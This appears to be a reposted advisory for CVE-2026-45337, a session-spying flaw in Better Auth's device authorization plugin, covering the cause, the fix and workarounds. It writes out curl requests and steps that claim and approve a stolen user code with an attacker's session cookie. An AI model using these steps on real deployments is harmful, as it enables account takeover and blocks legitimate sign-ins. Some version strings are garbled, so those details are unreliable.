Listen to this Post
CVE-2026-45337 is a session spying vulnerability in Better Auth’s `deviceAuthorization` plugin. When enabled and a third party can observe a pending user code before the legitimate user completes verification, an authenticated attacker can hijack the device flow. The core flaw is that the plugin treats any authenticated session as the owner of any pending device code. The ownership check on `POST /device/approve` and `POST /device/deny` short-circuits when the database row’s `userId` is unset, accepting any authenticated caller instead of rejecting the request. Meanwhile, the `GET /device` verification handler does not claim the row. This allows an attacker who learns a valid `user_code` (via shoulder surfing, screen sharing, logs, etc.) to claim the device session before the legitimate user completes approval. The attacker can then either bind the polling device to their own account (account takeover) or deny the legitimate sign-in flow (denial of service). This vulnerability directly corresponds to the “Session Spying” risk class described in RFC 8628 §5.5. The fix is implemented in [email protected], where `GET /device` now claims the pending row for the calling session. The approve and deny endpoints subsequently require strict equality between the row’s owner and the calling session. Custom verification pages must serve `GET /device` to an authenticated session for the flow to succeed. If you cannot upgrade immediately, workarounds include disabling the plugin, adding a `before` hook to track session ownership, or shortening the `expiresIn` lifetime of device codes.
DailyCVE Form:
Platform: better-auth
Version: >=1.6.0<1.6.11
Vulnerability : Session Spying
Severity: High (7.6)
date: 2026-06-04
Prediction: 2026-05-12 (patched)
What Undercode Say:
Check currently installed version
npm list better-auth
or
yarn list better-auth
Determine if the deviceAuthorization plugin is enabled
Look for 'deviceAuthorization()' in your auth configuration file
Simulate observing a pending user code (for testing only)
Capture the 'user_code' from the device flow initiation response
curl -X POST http://localhost:3000/api/auth/device/code \
-H "Content-Type: application/json"
Exploit attempt (conceptual)
Use the captured 'user_code' to poll the device endpoint
curl -X GET "http://localhost:3000/api/auth/device?user_code=<captured_code>" \
-H "Cookie: session=<attacker_session>"
Follow with an approve request to hijack the session
curl -X POST http://localhost:3000/api/auth/device/approve \
-H "Content-Type: application/json" \
-H "Cookie: session=<attacker_session>" \
-d '{"user_code":"<captured_code>"}'
Exploit:
- Identify target application using `better-auth` version >=1.6.0, <1.6.11 with `deviceAuthorization` plugin enabled.
- Obtain a valid `user_code` from the device flow initiation (e.g., by shoulder surfing, screen sharing, or intercepting logs).
- As an authenticated attacker, send a `GET /device` request with the observed `user_code` and the attacker’s session cookie.
- Immediately send a `POST /device/approve` request with the same `user_code` and session cookie.
- The vulnerable plugin binds the device session to the attacker’s account instead of the legitimate user.
Protection:
– Immediate Upgrade: Update to `[email protected]` or later.
– Disable Plugin: Remove `deviceAuthorization()` from the `plugins` array in your auth configuration if the device flow is not required.
– Add a `before` Hook: Implement a custom hook on `POST /device/approve` and `POST /device/deny` that tracks which session called `GET /device` for each user code, and rejects requests from mismatched sessions.
– Shorten Expiry: Reduce the `expiresIn` plugin option to minimize the window during which an observed user code remains valid.
– Monitor Logs: Audit access logs for `POST /device/approve` and `POST /device/deny` to detect unauthorized approval attempts.
Impact:
- Account Takeover: An attacker can bind the polling device to their own session, effectively operating the device as the attacker.
- Denial of Legitimate Sign-in: The attacker can mark the legitimate user’s device code as denied, completely blocking the victim’s authentication flow.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
